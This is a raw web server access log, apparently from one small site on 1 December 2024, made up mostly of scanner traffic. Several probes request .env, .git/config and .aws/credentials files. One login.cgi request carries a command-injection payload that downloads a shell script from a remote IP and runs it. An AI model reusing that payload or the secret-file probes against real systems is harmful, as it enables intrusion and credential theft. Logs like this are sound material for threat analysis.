179.43.163.250 - - [01/Dec/2024:05:14:20 +0100] "GET /.env.save HTTP/1.1" 404 314 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:14:21 +0100] "GET /assets../.git/config HTTP/1.1" 404 325 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:14:21 +0100] "GET /build/.env HTTP/1.1" 404 315 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:14:21 +0100] "GET /.env_sample HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:14:22 +0100] "GET /prod/.env HTTP/1.1" 404 314 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:14:22 +0100] "GET /files/.git/config HTTP/1.1" 404 322 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:14:22 +0100] "GET /project/.git/config HTTP/1.1" 404 324 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:14:22 +0100] "GET /api/.env HTTP/1.1" 404 313 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:14:23 +0100] "GET /data/.git/config HTTP/1.1" 404 321 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:14:23 +0100] "GET /.env.docker HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
3.101.14.189 - - [01/Dec/2024:05:15:37 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
93.174.93.12 - - [01/Dec/2024:05:15:57 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920)"
93.174.93.12 - - [01/Dec/2024:05:17:33 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920)"
125.229.151.234 - - [01/Dec/2024:05:18:12 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
93.174.93.12 - - [01/Dec/2024:05:19:15 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920)"
54.219.134.72 - - [01/Dec/2024:05:20:57 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
167.94.138.38 - - [01/Dec/2024:05:22:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.38 - - [01/Dec/2024:05:22:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.38 - - [01/Dec/2024:05:22:26 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.38 - - [01/Dec/2024:05:22:26 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
1.34.254.21 - - [01/Dec/2024:05:23:16 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
179.43.163.250 - - [01/Dec/2024:05:27:26 +0100] "\x16\x03\x01" 501 318 "-" "-"
179.43.163.250 - - [01/Dec/2024:05:27:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.163.250 - - [01/Dec/2024:05:27:26 +0100] "HELP" 501 319 "-" "-"
179.43.163.250 - - [01/Dec/2024:05:27:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "l9tcpid/v1.1.0"
179.43.163.250 - - [01/Dec/2024:05:27:26 +0100] "GET /public/.git/config HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:27:26 +0100] "GET /www/.git/config HTTP/1.1" 404 320 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:27:27 +0100] "GET /media../.git/config HTTP/1.1" 404 324 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:27:27 +0100] "GET /.env.sandbox HTTP/1.1" 404 317 "-" "l9explore/1.2.2"
141.98.11.35 - - [01/Dec/2024:05:27:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
125.229.237.151 - - [01/Dec/2024:05:28:26 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
59.127.84.223 - - [01/Dec/2024:05:33:04 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
167.94.146.63 - - [01/Dec/2024:05:35:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.63 - - [01/Dec/2024:05:35:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.63 - - [01/Dec/2024:05:35:23 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.63 - - [01/Dec/2024:05:35:23 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
114.35.33.191 - - [01/Dec/2024:05:37:52 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
87.236.176.197 - - [01/Dec/2024:05:38:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
95.214.55.79 - - [01/Dec/2024:05:44:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
89.248.168.227 - - [01/Dec/2024:05:44:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
179.43.163.250 - - [01/Dec/2024:05:45:38 +0100] "\x16\x03\x01" 501 318 "-" "-"
179.43.163.250 - - [01/Dec/2024:05:45:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.163.250 - - [01/Dec/2024:05:45:38 +0100] "HELP" 501 319 "-" "-"
179.43.163.250 - - [01/Dec/2024:05:45:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "l9tcpid/v1.1.0"
179.43.163.250 - - [01/Dec/2024:05:45:38 +0100] "GET /.env.ci HTTP/1.1" 404 312 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:45:38 +0100] "GET /media../.git/config HTTP/1.1" 404 324 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:45:39 +0100] "GET /.env.aws HTTP/1.1" 404 313 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:45:39 +0100] "GET /.env.secret HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:45:39 +0100] "GET /server/.git/config HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:45:39 +0100] "GET /.env.qa HTTP/1.1" 404 312 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:45:40 +0100] "GET /.envrc HTTP/1.1" 404 311 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:45:40 +0100] "GET /.env.stage HTTP/1.1" 404 315 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:45:40 +0100] "GET /.env.test HTTP/1.1" 404 314 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:45:40 +0100] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:45:40 +0100] "GET /.env.dist HTTP/1.1" 404 314 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:45:40 +0100] "GET /.env.docker-compose HTTP/1.1" 404 324 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:45:41 +0100] "GET /.env.live HTTP/1.1" 404 314 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:45:41 +0100] "GET /prod/.env HTTP/1.1" 404 314 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:45:41 +0100] "GET /.env.dev HTTP/1.1" 404 313 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:45:41 +0100] "GET /.env.save HTTP/1.1" 404 314 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:05:45:41 +0100] "GET /.env.uat HTTP/1.1" 404 313 "-" "l9explore/1.2.2"
194.50.16.198 - - [01/Dec/2024:05:49:51 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
194.50.16.198 - - [01/Dec/2024:05:49:51 +0100] "POST /apply.cgi HTTP/1.1" 404 314 "http://212.91.246.83:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
141.98.11.35 - - [01/Dec/2024:05:50:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
47.251.13.59 - - [01/Dec/2024:05:50:47 +0100] "\x16\x03\x01" 501 318 "-" "-"
64.62.197.229 - - [01/Dec/2024:05:51:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
74.82.47.3 - - [01/Dec/2024:05:51:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
64.62.197.118 - - [01/Dec/2024:05:51:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36"
141.98.11.35 - - [01/Dec/2024:05:52:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
64.62.197.161 - - [01/Dec/2024:05:52:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
170.106.180.139 - - [01/Dec/2024:05:52:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
64.62.197.239 - - [01/Dec/2024:05:53:58 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"
64.62.197.121 - - [01/Dec/2024:05:54:04 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
45.79.181.223 - - [01/Dec/2024:05:54:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.62.197.229 - - [01/Dec/2024:05:54:28 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
64.62.197.155 - - [01/Dec/2024:05:54:38 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0"
64.62.197.114 - - [01/Dec/2024:05:54:39 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36"
64.62.197.162 - - [01/Dec/2024:05:55:06 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
74.82.47.3 - - [01/Dec/2024:05:55:32 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
74.82.47.3 - - [01/Dec/2024:05:56:28 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
141.98.11.35 - - [01/Dec/2024:05:58:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
147.185.132.255 - - [01/Dec/2024:06:02:14 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
141.98.11.35 - - [01/Dec/2024:06:03:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.35 - - [01/Dec/2024:06:06:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
114.33.7.225 - - [01/Dec/2024:06:09:03 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
54.219.134.72 - - [01/Dec/2024:06:09:16 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
87.120.84.12 - - [01/Dec/2024:06:09:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36"
1.231.222.25 - - [01/Dec/2024:06:12:53 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
87.120.84.12 - - [01/Dec/2024:06:13:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 2.2; en-us; ADR6300 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
38.46.220.87 - - [01/Dec/2024:06:13:53 +0100] "CONNECT www.baidu.com:443 HTTP/1.1" 405 343 "-" "Go-http-client/1.1"
13.64.108.30 - - [01/Dec/2024:06:17:09 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
141.98.11.35 - - [01/Dec/2024:06:17:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
13.64.108.30 - - [01/Dec/2024:06:17:39 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
13.64.108.30 - - [01/Dec/2024:06:18:05 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
13.64.108.30 - - [01/Dec/2024:06:18:15 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
170.64.207.27 - - [01/Dec/2024:06:18:17 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
13.64.108.30 - - [01/Dec/2024:06:18:38 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
13.64.108.30 - - [01/Dec/2024:06:18:40 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
13.64.108.30 - - [01/Dec/2024:06:18:43 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
13.64.108.30 - - [01/Dec/2024:06:19:06 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
87.120.84.12 - - [01/Dec/2024:06:19:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; MDA Pro/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1)"
13.64.108.30 - - [01/Dec/2024:06:21:01 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
35.92.85.71 - - [01/Dec/2024:06:21:04 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
13.64.108.30 - - [01/Dec/2024:06:21:44 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
34.221.186.87 - - [01/Dec/2024:06:24:16 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
87.236.176.240 - - [01/Dec/2024:06:24:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
157.245.156.205 - - [01/Dec/2024:06:32:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
37.139.5.66 - - [01/Dec/2024:06:36:46 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "linus-torvalds-loves-you"
65.49.20.67 - - [01/Dec/2024:06:39:40 +0100] "\x16\x03\x01" 501 318 "-" "-"
34.247.174.27 - - [01/Dec/2024:06:42:34 +0100] "HEAD /spicons/apache_pb.gif HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
80.82.77.202 - - [01/Dec/2024:06:42:48 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG SM-G935F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36"
80.82.77.202 - - [01/Dec/2024:06:44:09 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG SM-G935F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36"
122.116.204.100 - - [01/Dec/2024:06:44:34 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
147.185.132.9 - - [01/Dec/2024:06:47:54 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
147.185.132.9 - - [01/Dec/2024:06:47:59 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
141.98.11.35 - - [01/Dec/2024:06:49:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
114.32.168.119 - - [01/Dec/2024:06:56:02 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
80.82.77.202 - - [01/Dec/2024:06:58:53 +0100] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
170.64.207.27 - - [01/Dec/2024:07:05:02 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
162.216.150.172 - - [01/Dec/2024:07:05:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
170.64.207.27 - - [01/Dec/2024:07:16:20 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [01/Dec/2024:07:17:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
147.185.132.28 - - [01/Dec/2024:07:17:46 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [01/Dec/2024:07:18:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
184.107.122.21 - - [01/Dec/2024:07:18:44 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
184.107.122.21 - - [01/Dec/2024:07:18:44 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
162.142.125.194 - - [01/Dec/2024:07:19:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.194 - - [01/Dec/2024:07:19:12 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.194 - - [01/Dec/2024:07:19:12 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [01/Dec/2024:07:19:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.174.93.12 - - [01/Dec/2024:07:19:42 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7)"
212.91.246.72 - - [01/Dec/2024:07:20:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
206.168.34.42 - - [01/Dec/2024:07:20:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.42 - - [01/Dec/2024:07:20:39 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.42 - - [01/Dec/2024:07:20:39 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
205.210.31.175 - - [01/Dec/2024:07:20:47 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.175 - - [01/Dec/2024:07:20:47 +0100] "\x16\x03\x01" 501 318 "-" "-"
93.174.93.12 - - [01/Dec/2024:07:20:56 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7)"
212.91.246.72 - - [01/Dec/2024:07:21:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:22:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:23:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:24:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:25:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:26:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:27:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.35 - - [01/Dec/2024:07:27:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Dec/2024:07:28:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:29:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:30:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:31:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.35 - - [01/Dec/2024:07:32:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Dec/2024:07:32:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [01/Dec/2024:07:33:31 +0100] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.246.72 - - [01/Dec/2024:07:33:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:34:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.183.120.51 - - [01/Dec/2024:07:35:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
179.43.163.250 - - [01/Dec/2024:07:35:35 +0100] "\x16\x03\x01" 501 318 "-" "-"
179.43.163.250 - - [01/Dec/2024:07:35:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.163.250 - - [01/Dec/2024:07:35:35 +0100] "HELP" 501 319 "-" "-"
179.43.163.250 - - [01/Dec/2024:07:35:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "l9tcpid/v1.1.0"
